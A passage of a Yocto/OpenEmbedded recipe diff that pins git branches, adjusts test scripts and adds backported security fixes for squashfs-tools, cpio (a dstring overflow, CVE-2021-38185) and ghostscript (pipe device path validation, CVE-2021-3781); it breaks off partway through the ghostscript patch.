diff --git a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
index 2b1409d78d3..caa5417ed02 100644
--- a/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
+++ b/meta/recipes-devtools/squashfs-tools/squashfs-tools_git.bb
@@ -9,8 +9,13 @@ LIC_FILES_CHKSUM = "file://../COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
PV = "4.4"
SRCREV = "52eb4c279cd283ed9802dd1ceb686560b22ffb67"
-SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https \
+SRC_URI = "git://github.com/plougher/squashfs-tools.git;protocol=https;branch=master \
file://0001-squashfs-tools-fix-build-failure-against-gcc-10.patch;striplevel=2 \
+ file://CVE-2021-40153.patch;striplevel=2 \
+ file://CVE-2021-41072-requisite-1.patch;striplevel=2 \
+ file://CVE-2021-41072-requisite-2.patch;striplevel=2 \
+ file://CVE-2021-41072-requisite-3.patch;striplevel=2 \
+ file://CVE-2021-41072.patch;striplevel=2 \
"
S = "${WORKDIR}/git/squashfs-tools"
diff --git a/meta/recipes-devtools/strace/strace/run-ptest b/meta/recipes-devtools/strace/strace/run-ptest
index 3a51fb0be9d..02bb91e07fe 100755
--- a/meta/recipes-devtools/strace/strace/run-ptest
+++ b/meta/recipes-devtools/strace/strace/run-ptest
@@ -1,6 +1,15 @@
#!/bin/sh
+
+set -u
+
export TIMEOUT_DURATION=240
chown nobody tests
chown nobody tests/*
chown nobody ../ptest
+
su nobody -c "make -B -C tests -k test-suite.log"
+res=$?
+if [ $res -ne 0 ]; then
+ cat tests/test-suite.log
+fi
+exit $res
diff --git a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_234.bb b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_234.bb
index 905a0cbb72e..44f0c8c8f20 100644
--- a/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_234.bb
+++ b/meta/recipes-devtools/systemd-bootchart/systemd-bootchart_234.bb
@@ -8,7 +8,7 @@ LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE.LGPL2.1;md5=4fbd65380cdd255951079008b364516c \
file://LICENSE.GPL2;md5=751419260aa954499f7abaabaa882bbe"
-SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https \
+SRC_URI = "git://github.com/systemd/systemd-bootchart.git;protocol=https;branch=master \
file://0001-architecture-Recognise-RISCV-32-RISCV-64.patch \
file://mips64.patch \
file://no_lto.patch \
diff --git a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
index 854269a0fa7..7f790c9dbb9 100644
--- a/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
+++ b/meta/recipes-devtools/tcf-agent/tcf-agent_git.bb
@@ -10,7 +10,7 @@ SRCREV = "a022ef2f1acfd9209a1bf792dda14ae4b0d1b60f"
PV = "1.7.0+git${SRCPV}"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>(\d+(\.\d+)+))"
-SRC_URI = "git://git.eclipse.org/gitroot/tcf/org.eclipse.tcf.agent \
+SRC_URI = "git://git.eclipse.org/r/tcf/org.eclipse.tcf.agent.git;protocol=https;branch=master \
file://fix_ranlib.patch \
file://ldflags.patch \
file://tcf-agent.init \
diff --git a/meta/recipes-devtools/tcltk/tcl_8.6.11.bb b/meta/recipes-devtools/tcltk/tcl_8.6.11.bb
index efb36b32dda..a993d7c9595 100644
--- a/meta/recipes-devtools/tcltk/tcl_8.6.11.bb
+++ b/meta/recipes-devtools/tcltk/tcl_8.6.11.bb
@@ -30,6 +30,9 @@ SRC_URI[sha256sum] = "8c0486668586672c5693d7d95817cb05a18c5ecca2f40e2836b9578064
SRC_URI_class-native = "${BASE_SRC_URI}"
S = "${WORKDIR}/${BPN}${PV}/unix"
+# Upstream don't believe this is an exploitable issue
+# https://core.tcl-lang.org/tcl/info/7079e4f91601e9c7
+CVE_CHECK_WHITELIST += "CVE-2021-35331"
PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${BPN}${PV}"
VER = "${PV}"
diff --git a/meta/recipes-devtools/unfs3/unfs3_git.bb b/meta/recipes-devtools/unfs3/unfs3_git.bb
index a21fb58397c..bcaa4e2822e 100644
--- a/meta/recipes-devtools/unfs3/unfs3_git.bb
+++ b/meta/recipes-devtools/unfs3/unfs3_git.bb
@@ -14,7 +14,7 @@ DEPENDS_append_class-nativesdk = " flex-nativesdk"
ASNEEDED = ""
S = "${WORKDIR}/git"
-SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https \
+SRC_URI = "git://github.com/unfs3/unfs3.git;protocol=https;branch=master \
file://unfs3_parallel_build.patch \
file://alternate_rpc_ports.patch \
file://fix_pid_race_parent_writes_child_pid.patch \
diff --git a/meta/recipes-devtools/valgrind/valgrind/remove-for-all b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
index d6a85c47359..0427790825e 100644
--- a/meta/recipes-devtools/valgrind/valgrind/remove-for-all
+++ b/meta/recipes-devtools/valgrind/valgrind/remove-for-all
@@ -1,2 +1,3 @@
drd/tests/bar_bad
drd/tests/bar_bad_xml
+none/tests/amd64/fb_test_amd64
diff --git a/meta/recipes-extended/bash/bash.inc b/meta/recipes-extended/bash/bash.inc
index d3e1dfdb30b..37871bcdca8 100644
--- a/meta/recipes-extended/bash/bash.inc
+++ b/meta/recipes-extended/bash/bash.inc
@@ -62,6 +62,11 @@ do_compile_ptest () {
oe_runmake buildtest
}
+do_install_prepend () {
+ # Ensure determinism as this counter increases for each make call
+ rm -f ${B}/.build
+}
+
do_install_append () {
# Move /usr/bin/bash to /bin/bash, if need
if [ "${base_bindir}" != "${bindir}" ]; then
diff --git a/meta/recipes-extended/bzip2/bzip2/Makefile.am b/meta/recipes-extended/bzip2/bzip2/Makefile.am
index 7338df03ebe..d12d3a45e47 100644
--- a/meta/recipes-extended/bzip2/bzip2/Makefile.am
+++ b/meta/recipes-extended/bzip2/bzip2/Makefile.am
@@ -1,6 +1,6 @@
lib_LTLIBRARIES = libbz2.la
-libbz2_la_LDFLAGS = -version-info 1:6:0
+libbz2_la_LDFLAGS = -version-info 1:8:0
libbz2_la_SOURCES = blocksort.c \
huffman.c \
diff --git a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb
index 70eb67f1f26..d2f34449b30 100644
--- a/meta/recipes-extended/bzip2/bzip2_1.0.8.bb
+++ b/meta/recipes-extended/bzip2/bzip2_1.0.8.bb
@@ -22,7 +22,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;beginline=4;endline=37;md5=600af43c50f1fcb82e
"
SRC_URI = "https://sourceware.org/pub/${BPN}/${BPN}-${PV}.tar.gz \
- git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests \
+ git://sourceware.org/git/bzip2-tests.git;name=bzip2-tests;branch=master \
file://configure.ac;subdir=${BP} \
file://Makefile.am;subdir=${BP} \
file://run-ptest \
diff --git a/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
new file mode 100644
index 00000000000..6ceafeee497
--- /dev/null
+++ b/meta/recipes-extended/cpio/cpio-2.13/CVE-2021-38185.patch
@@ -0,0 +1,581 @@
+GNU cpio through 2.13 allows attackers to execute arbitrary code via a crafted
+pattern file, because of a dstring.c ds_fgetstr integer overflow that triggers
+an out-of-bounds heap write.
+
+CVE: CVE-2021-38185
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From e494c68a3a0951b1eaba77e2db93f71a890e15d8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 7 Aug 2021 12:52:21 +0300
+Subject: [PATCH 1/3] Rewrite dynamic string support.
+
+* src/dstring.c (ds_init): Take a single argument.
+(ds_free): New function.
+(ds_resize): Take a single argument. Use x2nrealloc to expand
+the storage.
+(ds_reset,ds_append,ds_concat,ds_endswith): New function.
+(ds_fgetstr): Rewrite. In particular, this fixes integer overflow.
+* src/dstring.h (dynamic_string): Keep both the allocated length
+(ds_size) and index of the next free byte in the string (ds_idx).
+(ds_init,ds_resize): Change signature.
+(ds_len): New macro.
+(ds_free,ds_reset,ds_append,ds_concat,ds_endswith): New protos.
+* src/copyin.c: Use new ds_ functions.
+* src/copyout.c: Likewise.
+* src/copypass.c: Likewise.
+* src/util.c: Likewise.
+---
+ src/copyin.c | 40 +++++++++++------------
+ src/copyout.c | 16 ++++-----
+ src/copypass.c | 34 +++++++++----------
+ src/dstring.c | 88 ++++++++++++++++++++++++++++++++++++--------------
+ src/dstring.h | 31 +++++++++---------
+ src/util.c | 6 ++--
+ 6 files changed, 123 insertions(+), 92 deletions(-)
+
+diff --git a/src/copyin.c b/src/copyin.c
+index b29f348..37e503a 100644
+--- a/src/copyin.c
++++ b/src/copyin.c
+@@ -55,11 +55,12 @@ query_rename(struct cpio_file_stat* file_hdr, FILE *tty_in, FILE *tty_out,
+ char *str_res; /* Result for string function. */
+ static dynamic_string new_name; /* New file name for rename option. */
+ static int initialized_new_name = false;
++
+ if (!initialized_new_name)
+- {
+- ds_init (&new_name, 128);
+- initialized_new_name = true;
+- }
++ {
++ ds_init (&new_name);
++ initialized_new_name = true;
++ }
+
+ if (rename_flag)
+ {
+@@ -779,37 +780,36 @@ long_format (struct cpio_file_stat *file_hdr, char const *link_name)
+ already in `save_patterns' (from the command line) are preserved. */
+
+ static void
+-read_pattern_file ()
++read_pattern_file (void)
+ {
+- int max_new_patterns;
+- char **new_save_patterns;
+- int new_num_patterns;
++ char **new_save_patterns = NULL;
++ size_t max_new_patterns;
++ size_t new_num_patterns;
+ int i;
+- dynamic_string pattern_name;
++ dynamic_string pattern_name = DYNAMIC_STRING_INITIALIZER;
+ FILE *pattern_fp;
+
+ if (num_patterns < 0)
+ num_patterns = 0;
+- max_new_patterns = 1 + num_patterns;
+- new_save_patterns = (char **) xmalloc (max_new_patterns * sizeof (char *));
+ new_num_patterns = num_patterns;
+- ds_init (&pattern_name, 128);
++ max_new_patterns = num_patterns;
++ new_save_patterns = xcalloc (max_new_patterns, sizeof (new_save_patterns[0]));
+
+ pattern_fp = fopen (pattern_file_name, "r");
+ if (pattern_fp == NULL)
+ open_fatal (pattern_file_name);
+ while (ds_fgetstr (pattern_fp, &pattern_name, '\n') != NULL)
+ {
+- if (new_num_patterns >= max_new_patterns)
+- {
+- max_new_patterns += 1;
+- new_save_patterns = (char **)
+- xrealloc ((char *) new_save_patterns,
+- max_new_patterns * sizeof (char *));
+- }
++ if (new_num_patterns == max_new_patterns)
++ new_save_patterns = x2nrealloc (new_save_patterns,
++ &max_new_patterns,
++ sizeof (new_save_patterns[0]));
+ new_save_patterns[new_num_patterns] = xstrdup (pattern_name.ds_string);
+ ++new_num_patterns;
+ }
++
++ ds_free (&pattern_name);
++
+ if (ferror (pattern_fp) || fclose (pattern_fp) == EOF)
+ close_error (pattern_file_name);
+
+@@ -1196,7 +1196,7 @@ swab_array (char *ptr, int count)
+ in the file system. */
+
+ void
+-process_copy_in ()
++process_copy_in (void)
+ {
+ char done = false; /* True if trailer reached. */
+ FILE *tty_in = NULL; /* Interactive file for rename option. */
+diff --git a/src/copyout.c b/src/copyout.c
+index 8b0beb6..26e3dda 100644
+--- a/src/copyout.c
++++ b/src/copyout.c
+@@ -594,9 +594,10 @@ assign_string (char **pvar, char *value)
+ The format of the header depends on the compatibility (-c) flag. */
+
+ void
+-process_copy_out ()
++process_copy_out (void)
+ {
+- dynamic_string input_name; /* Name of file read from stdin. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file read from stdin. */
+ struct stat file_stat; /* Stat record for file. */
+ struct cpio_file_stat file_hdr = CPIO_FILE_STAT_INITIALIZER;
+ /* Output header information. */
+@@ -605,7 +606,6 @@ process_copy_out ()
+ char *orig_file_name = NULL;
+
+ /* Initialize the copy out. */
+- ds_init (&input_name, 128);
+ file_hdr.c_magic = 070707;
+
+ /* Check whether the output file might be a tape. */
+@@ -657,14 +657,9 @@ process_copy_out ()
+ {
+ if (file_hdr.c_mode & CP_IFDIR)
+ {
+- int len = strlen (input_name.ds_string);
+ /* Make sure the name ends with a slash */
+- if (input_name.ds_string[len-1] != '/')
+- {
+- ds_resize (&input_name, len + 2);
+- input_name.ds_string[len] = '/';
+- input_name.ds_string[len+1] = 0;
+- }
++ if (!ds_endswith (&input_name, '/'))
++ ds_append (&input_name, '/');
+ }
+ }
+
+@@ -875,6 +870,7 @@ process_copy_out ()
+ (unsigned long) blocks), (unsigned long) blocks);
+ }
+ cpio_file_stat_free (&file_hdr);
++ ds_free (&input_name);
+ }
+
+
+diff --git a/src/copypass.c b/src/copypass.c
+index dc13b5b..62f31c6 100644
+--- a/src/copypass.c
++++ b/src/copypass.c
+@@ -48,10 +48,12 @@ set_copypass_perms (int fd, const char *name, struct stat *st)
+ If `link_flag', link instead of copying. */
+
+ void
+-process_copy_pass ()
++process_copy_pass (void)
+ {
+- dynamic_string input_name; /* Name of file from stdin. */
+- dynamic_string output_name; /* Name of new file. */
++ dynamic_string input_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of file from stdin. */
++ dynamic_string output_name = DYNAMIC_STRING_INITIALIZER;
++ /* Name of new file. */
+ size_t dirname_len; /* Length of `directory_name'. */
+ int res; /* Result of functions. */
+ char *slash; /* For moving past slashes in input name. */
+@@ -65,25 +67,18 @@ process_copy_pass ()
+ created files */
+
+ /* Initialize the copy pass. */
+- ds_init (&input_name, 128);
+
+ dirname_len = strlen (directory_name);
+ if (change_directory_option && !ISSLASH (directory_name[0]))
+ {
+ char *pwd = xgetcwd ();
+-
+- dirname_len += strlen (pwd) + 1;
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, pwd);
+- strcat (output_name.ds_string, "/");
+- strcat (output_name.ds_string, directory_name);
++
++ ds_concat (&output_name, pwd);
++ ds_append (&output_name, '/');
+ }
+- else
+- {
+- ds_init (&output_name, dirname_len + 2);
+- strcpy (output_name.ds_string, directory_name);
+- }
+- output_name.ds_string[dirname_len] = '/';
++ ds_concat (&output_name, directory_name);
++ ds_append (&output_name, '/');
++ dirname_len = ds_len (&output_name);
+ output_is_seekable = true;
+
+ change_dir ();
+@@ -116,8 +111,8 @@ process_copy_pass ()
+ /* Make the name of the new file. */
+ for (slash = input_name.ds_string; *slash == '/'; ++slash)
+ ;
+- ds_resize (&output_name, dirname_len + strlen (slash) + 2);
+- strcpy (output_name.ds_string + dirname_len + 1, slash);
++ ds_reset (&output_name, dirname_len);
++ ds_concat (&output_name, slash);
+
+ existing_dir = false;
+ if (lstat (output_name.ds_string, &out_file_stat) == 0)
+@@ -333,6 +328,9 @@ process_copy_pass ()
+ (unsigned long) blocks),
+ (unsigned long) blocks);
+ }
++
++ ds_free (&input_name);
++ ds_free (&output_name);
+ }
+
+ /* Try and create a hard link from FILE_NAME to another file
+diff --git a/src/dstring.c b/src/dstring.c
+index e9c063f..358f356 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -20,8 +20,8 @@
+ #if defined(HAVE_CONFIG_H)
+ # include <config.h>
+ #endif
+-
+ #include <stdio.h>
++#include <stdlib.h>
+ #if defined(HAVE_STRING_H) || defined(STDC_HEADERS)
+ #include <string.h>
+ #else
+@@ -33,24 +33,41 @@
+ /* Initialiaze dynamic string STRING with space for SIZE characters. */
+
+ void
+-ds_init (dynamic_string *string, int size)
++ds_init (dynamic_string *string)
++{
++ memset (string, 0, sizeof *string);
++}
++
++/* Free the dynamic string storage. */
++
++void
++ds_free (dynamic_string *string)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xmalloc (size);
++ free (string->ds_string);
+ }
+
+-/* Expand dynamic string STRING, if necessary, to hold SIZE characters. */
++/* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string, int size)
++ds_resize (dynamic_string *string)
+ {
+- if (size > string->ds_length)
++ if (string->ds_idx == string->ds_size)
+ {
+- string->ds_length = size;
+- string->ds_string = (char *) xrealloc ((char *) string->ds_string, size);
++ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
++ 1);
+ }
+ }
+
++/* Reset the index of the dynamic string S to LEN. */
++
++void
++ds_reset (dynamic_string *s, size_t len)
++{
++ while (len > s->ds_size)
++ ds_resize (s);
++ s->ds_idx = len;
++}
++
+ /* Dynamic string S gets a string terminated by the EOS character
+ (which is removed) from file F. S will increase
+ in size during the function if the string from F is longer than
+@@ -61,34 +78,50 @@ ds_resize (dynamic_string *string, int size)
+ char *
+ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ {
+- int insize; /* Amount needed for line. */
+- int strsize; /* Amount allocated for S. */
+ int next_ch;
+
+ /* Initialize. */
+- insize = 0;
+- strsize = s->ds_length;
++ s->ds_idx = 0;
+
+ /* Read the input string. */
+- next_ch = getc (f);
+- while (next_ch != eos && next_ch != EOF)
++ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- if (insize >= strsize - 1)
+- {
+- ds_resize (s, strsize * 2 + 2);
+- strsize = s->ds_length;
+- }
+- s->ds_string[insize++] = next_ch;
+- next_ch = getc (f);
++ ds_resize (s);
++ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- s->ds_string[insize++] = '\0';
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = '\0';
+
+- if (insize == 1 && next_ch == EOF)
++ if (s->ds_idx == 0 && next_ch == EOF)
+ return NULL;
+ else
+ return s->ds_string;
+ }
+
++void
++ds_append (dynamic_string *s, int c)
++{
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = c;
++ if (c)
++ {
++ s->ds_idx++;
++ ds_resize (s);
++ s->ds_string[s->ds_idx] = 0;
++ }
++}
++
++void
++ds_concat (dynamic_string *s, char const *str)
++{
++ size_t len = strlen (str);
++ while (len + 1 > s->ds_size)
++ ds_resize (s);
++ memcpy (s->ds_string + s->ds_idx, str, len);
++ s->ds_idx += len;
++ s->ds_string[s->ds_idx] = 0;
++}
++
+ char *
+ ds_fgets (FILE *f, dynamic_string *s)
+ {
+@@ -100,3 +133,10 @@ ds_fgetname (FILE *f, dynamic_string *s)
+ {
+ return ds_fgetstr (f, s, '\0');
+ }
++
++/* Return true if the dynamic string S ends with character C. */
++int
++ds_endswith (dynamic_string *s, int c)
++{
++ return (s->ds_idx > 0 && s->ds_string[s->ds_idx - 1] == c);
++}
+diff --git a/src/dstring.h b/src/dstring.h
+index b5135fe..f5b04ef 100644
+--- a/src/dstring.h
++++ b/src/dstring.h
+@@ -17,10 +17,6 @@
+ Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
+ Boston, MA 02110-1301 USA. */
+
+-#ifndef NULL
+-#define NULL 0
+-#endif
+-
+ /* A dynamic string consists of record that records the size of an
+ allocated string and the pointer to that string. The actual string
+ is a normal zero byte terminated string that can be used with the
+@@ -30,22 +26,25 @@
+
+ typedef struct
+ {
+- int ds_length; /* Actual amount of storage allocated. */
+- char *ds_string; /* String. */
++ size_t ds_size; /* Actual amount of storage allocated. */
++ size_t ds_idx; /* Index of the next free byte in the string. */
++ char *ds_string; /* String storage. */
+ } dynamic_string;
+
++#define DYNAMIC_STRING_INITIALIZER { 0, 0, NULL }
+
+-/* Macros that look similar to the original string functions.
+- WARNING: These macros work only on pointers to dynamic string records.
+- If used with a real record, an "&" must be used to get the pointer. */
+-#define ds_strlen(s) strlen ((s)->ds_string)
+-#define ds_strcmp(s1, s2) strcmp ((s1)->ds_string, (s2)->ds_string)
+-#define ds_strncmp(s1, s2, n) strncmp ((s1)->ds_string, (s2)->ds_string, n)
+-#define ds_index(s, c) index ((s)->ds_string, c)
+-#define ds_rindex(s, c) rindex ((s)->ds_string, c)
++void ds_init (dynamic_string *string);
++void ds_free (dynamic_string *string);
++void ds_reset (dynamic_string *s, size_t len);
+
+-void ds_init (dynamic_string *string, int size);
+-void ds_resize (dynamic_string *string, int size);
++/* All functions below guarantee that s->ds_string[s->ds_idx] == '\0' */
+ char *ds_fgetname (FILE *f, dynamic_string *s);
+ char *ds_fgets (FILE *f, dynamic_string *s);
+ char *ds_fgetstr (FILE *f, dynamic_string *s, char eos);
++void ds_append (dynamic_string *s, int c);
++void ds_concat (dynamic_string *s, char const *str);
++
++#define ds_len(s) ((s)->ds_idx)
++
++int ds_endswith (dynamic_string *s, int c);
++
+diff --git a/src/util.c b/src/util.c
+index 4421b20..6d6bbaa 100644
+--- a/src/util.c
++++ b/src/util.c
+@@ -846,11 +846,9 @@ get_next_reel (int tape_des)
+ FILE *tty_out; /* File for interacting with user. */
+ int old_tape_des;
+ char *next_archive_name;
+- dynamic_string new_name;
++ dynamic_string new_name = DYNAMIC_STRING_INITIALIZER;
+ char *str_res;
+
+- ds_init (&new_name, 128);
+-
+ /* Open files for interactive communication. */
+ tty_in = fopen (TTY_NAME, "r");
+ if (tty_in == NULL)
+@@ -925,7 +923,7 @@ get_next_reel (int tape_des)
+ error (PAXEXIT_FAILURE, 0, _("internal error: tape descriptor changed from %d to %d"),
+ old_tape_des, tape_des);
+
+- free (new_name.ds_string);
++ ds_free (&new_name);
+ fclose (tty_in);
+ fclose (tty_out);
+ }
+--
+2.25.1
+
+
+From fb7a51bf85b8e6f045cacb4fb783db4a414741bf Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 11 Aug 2021 18:10:38 +0300
+Subject: [PATCH 2/3] Fix previous commit
+
+* src/dstring.c (ds_reset,ds_concat): Don't call ds_resize in a
+loop.
+---
+ src/dstring.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 358f356..90c691c 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -64,7 +64,7 @@ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+ while (len > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ s->ds_idx = len;
+ }
+
+@@ -116,7 +116,7 @@ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+ while (len + 1 > s->ds_size)
+- ds_resize (s);
++ s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
+
+From 86b37d74b15f9bb5fe62fd1642cc126d3ace0189 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Wed, 18 Aug 2021 09:41:39 +0300
+Subject: [PATCH 3/3] Fix dynamic string reallocations
+
+* src/dstring.c (ds_resize): Take additional argument: number of
+bytes to leave available after ds_idx. All uses changed.
+---
+ src/dstring.c | 18 ++++++++----------
+ 1 file changed, 8 insertions(+), 10 deletions(-)
+
+diff --git a/src/dstring.c b/src/dstring.c
+index 90c691c..0f597cc 100644
+--- a/src/dstring.c
++++ b/src/dstring.c
+@@ -49,9 +49,9 @@ ds_free (dynamic_string *string)
+ /* Expand dynamic string STRING, if necessary. */
+
+ void
+-ds_resize (dynamic_string *string)
++ds_resize (dynamic_string *string, size_t len)
+ {
+- if (string->ds_idx == string->ds_size)
++ while (len + string->ds_idx >= string->ds_size)
+ {
+ string->ds_string = x2nrealloc (string->ds_string, &string->ds_size,
+ 1);
+@@ -63,8 +63,7 @@ ds_resize (dynamic_string *string)
+ void
+ ds_reset (dynamic_string *s, size_t len)
+ {
+- while (len > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ s->ds_idx = len;
+ }
+
+@@ -86,10 +85,10 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ /* Read the input string. */
+ while ((next_ch = getc (f)) != eos && next_ch != EOF)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx++] = next_ch;
+ }
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = '\0';
+
+ if (s->ds_idx == 0 && next_ch == EOF)
+@@ -101,12 +100,12 @@ ds_fgetstr (FILE *f, dynamic_string *s, char eos)
+ void
+ ds_append (dynamic_string *s, int c)
+ {
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = c;
+ if (c)
+ {
+ s->ds_idx++;
+- ds_resize (s);
++ ds_resize (s, 0);
+ s->ds_string[s->ds_idx] = 0;
+ }
+ }
+@@ -115,8 +114,7 @@ void
+ ds_concat (dynamic_string *s, char const *str)
+ {
+ size_t len = strlen (str);
+- while (len + 1 > s->ds_size)
+- s->ds_string = x2nrealloc (s->ds_string, &s->ds_size, 1);
++ ds_resize (s, len);
+ memcpy (s->ds_string + s->ds_idx, str, len);
+ s->ds_idx += len;
+ s->ds_string[s->ds_idx] = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/cpio/cpio_2.13.bb b/meta/recipes-extended/cpio/cpio_2.13.bb
index f4df826ed9c..f3f2be17df7 100644
--- a/meta/recipes-extended/cpio/cpio_2.13.bb
+++ b/meta/recipes-extended/cpio/cpio_2.13.bb
@@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f27defe1e96c2e1ecd4e0c9be8967949"
SRC_URI = "${GNU_MIRROR}/cpio/cpio-${PV}.tar.gz \
file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0002-src-global.c-Remove-superfluous-declaration-of-progr.patch \
+ file://CVE-2021-38185.patch \
"
SRC_URI[md5sum] = "389c5452d667c23b5eceb206f5000810"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch
new file mode 100644
index 00000000000..44bdfbba350
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-704342-Include-device-specifier-strings-in-acces.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport (http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=a9bd3dec9fde03327a4a2c69dad1036bf9632e20)
+
+Signed-off-by: Trevor Gamblin <trevor.gamblin@windriver.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ /* The pipe device can be reached in two ways, explicltly with %pipe%
++ or implicitly with "|", so we have to check for both
++ */
++ char f[gp_file_name_sizeof];
++ const char *pipestr = "|";
++ const size_t pipestrlen = strlen(pipestr);
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++ int code1;
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ code1 = gp_validate_path(mem, f, access);
++
++ memcpy(f, pipestr, pipestrlen);
++ memcpy(f + pipestrlen, fname, nlen + 1);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+ return gs_error_invalidfileaccess;
+
+ /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ long hfile; /* Correct for Win32, may be wrong for Win64 */
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ char f[gp_file_name_sizeof];
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, f, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
